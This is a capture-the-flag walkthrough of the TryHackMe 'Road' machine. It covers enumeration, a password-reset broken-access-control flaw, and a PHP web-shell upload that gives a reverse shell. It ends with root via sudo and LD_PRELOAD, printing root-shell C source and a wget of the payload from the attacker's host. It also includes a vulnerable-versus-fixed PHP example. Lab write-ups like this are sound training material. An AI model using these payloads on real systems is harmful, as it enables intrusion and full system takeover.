Road – Walkthrough En | TryHackMe – Write-up

Inspired by a real-world pentesting engagement

Road is a medium difficulty CTF from TryHackMe. It is a very well done CTF both on the web part with a Broken Access Control and on the privilege escalation with LD_PRELOAD.


Enumeration

Command:

nmap -T5 -p- 10.10.239.205


Two ports are open: SSH on port 22 and a website on port 80. Port 22 is of no use for now, so go straight to enumerating the website.

Web enumeration

Command:

dirsearch -u 10.10.239.205 -x 403


Website access:

It’s basically a simple visit to see what the website looks like and see what we can do.

As it is possible to create an account, you might as well make one…

Access to the user account

Once the account is created, you have to look at what options the user has the right to modify.

The user can do two things, change their password and upload a profile picture.

It is important to look everywhere. In particular, note the message indicating that only the admin can access this function.

Broken access control

The only option the user ultimately has is to change their password. We are therefore going to change it, but while intercepting the request with Burp Suite.

The following screenshot shows the password change on the browser side:

The following screenshot shows the password change on the BurpSuite side (once the request has been intercepted).

The request shows us three elements:

  • email address,
  • new password,
  • confirmation.

Since we know the email address of the admin account, admin@sky.thm, we can simply put it in place of ours: the server never checks that the email in the request belongs to the logged-in user.
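To make the flaw concrete, here is an added example that is not from the original write-up or from the Road box itself: a PHP password-change handler that trusts the submitted email address, next to a fixed version that takes the target account from the server-side session and re-checks the current password. The PDO handle, the users table layout, the user_id session key and the form field names (email, npass, cpass, current) are all assumptions.

```php
<?php
// Added example (not the Road box's own code). Assumes a PDO connection $pdo,
// PHP sessions, and a "users" table with columns id, email, password_hash.
session_start();

// VULNERABLE: the account to update is chosen by the client-supplied email.
// Any logged-in user can submit admin@sky.thm and reset the admin password.
function changePasswordVulnerable(PDO $pdo): void
{
    $email   = $_POST['email'];
    $newPass = $_POST['npass'];
    if ($newPass !== $_POST['cpass']) {
        http_response_code(400);
        return;
    }
    $stmt = $pdo->prepare('UPDATE users SET password_hash = ? WHERE email = ?');
    $stmt->execute([password_hash($newPass, PASSWORD_DEFAULT), $email]);
}

// FIXED: the target account comes from the server-side session, never from
// the request body, and the caller must prove the current password first.
function changePasswordFixed(PDO $pdo): void
{
    if (empty($_SESSION['user_id'])) {
        http_response_code(401);
        return;
    }
    $newPass = $_POST['npass'] ?? '';
    if ($newPass === '' || $newPass !== ($_POST['cpass'] ?? '')) {
        http_response_code(400);
        return;
    }
    // Re-authenticate the session user before touching credentials.
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE id = ?');
    $stmt->execute([$_SESSION['user_id']]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if (!$row || !password_verify($_POST['current'] ?? '', $row['password_hash'])) {
        http_response_code(403);
        return;
    }
    $stmt = $pdo->prepare('UPDATE users SET password_hash = ? WHERE id = ?');
    $stmt->execute([password_hash($newPass, PASSWORD_DEFAULT), $_SESSION['user_id']]);
    // Rotate the session id after a credential change.
    session_regenerate_id(true);
}
```

The email field is not needed at all in the fixed handler: whatever the client sends, only the account bound to the session can be modified.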

Photo change

Once the modified request has been forwarded, it is possible to access the admin account.

Changing the profile picture

If we come back to the note, only the admin can modify his profile picture.

We will directly upload a PHP shell to see whether there is any filtering on file extensions.


No problem, the file is saved. A message "image saved" appears very briefly.


Where is the picture?

The only remaining problem is to find where the file has been saved…

The answer can be found in the source code of the page, at the bottom:

<!-- /v2/profileimages/ -->


Initial foothold

Direct access to the directory URL is not possible: directory listing is disabled.

This is not a problem, we just access our payload directly by its file name:

http://10.10.239.205/v2/profileimages/shell.php

With a netcat listening, we get a reverse shell.


Lateral movement: www-data to webdeveloper

Running linpeas does not reveal anything important. It appears that the netstat command was not executed: in fact, netstat is not installed on the machine. Instead, we can use ss.

Command:

ss -atur

Several ports are listening, including port 27017, which corresponds to MongoDB.

Connection to MongoDB

Command to connect to the database:

mongo 127.0.0.1

Command to list the databases:

show dbs

Command to select a database (followed by its name):

use

Command to list the collections (the equivalent of tables):

show collections

Command to display the contents of a collection:

db.collection.find()


Privilege escalation

Once on the webdeveloper account, run this command. It remains one of the first commands to run, if not the first.

Command:

sudo -l


The privilege escalation is very well thought out. You must use the two pieces of information displayed: LD_PRELOAD and /usr/bin/sky_backup_utility.

The binary allows you to make backups with root rights. LD_PRELOAD makes the dynamic loader load a shared library of your choice before the program starts. Through sudo this only works because the sudoers configuration keeps LD_PRELOAD in the environment (env_keep), which is exactly what sudo -l reveals here; by default sudo strips it.

So if we create a shared library that spawns a root shell and run sky_backup_utility through sudo with that library preloaded, we get root access.

Creation of the payload

Command:

vim shell.c

copy this inside:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* _init() is run by the loader when the library is loaded, before the program's main(). */
void _init() {
    unsetenv("LD_PRELOAD");  /* do not preload ourselves into the child shell */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Command to compile:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Any warnings that appear are of no importance. Note that the compilation can be done either on the target machine or on Kali.

To transfer shell.so from Kali, start a web server:

python3 -m http.server

Command to download it on the target host:

wget http://10.11.38.124:8000/shell.so

Final command to root the box:

sudo LD_PRELOAD=/tmp/shell.so /usr/bin/sky_backup_utility

#


That’s all folks

Thank you for taking the trouble to come to the site to read this write-up.

I hope it helped you and taught you new things.

Please feel free to leave a comment or share this article.
